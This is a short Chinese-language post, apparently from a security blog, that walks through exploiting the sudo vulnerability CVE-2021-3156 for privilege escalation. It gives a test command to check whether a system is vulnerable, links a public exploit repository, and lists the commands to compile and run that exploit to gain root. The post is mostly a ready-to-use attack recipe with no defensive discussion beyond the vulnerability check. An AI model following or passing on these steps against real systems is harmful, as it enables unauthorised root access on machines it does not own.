发布于mumsec

CVE-2021-3156

Sudo应用提权

测试漏洞是否存在

sudoedit -s /

如果返回以sudoedit:开头的错误,则当前系统可能存在安全风险

不受影响的系统将显示以usage:开头的错误。

下载exp

https://github.com/blasty/CVE-2021-3156

编译exp

make

exp提权

./sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich 1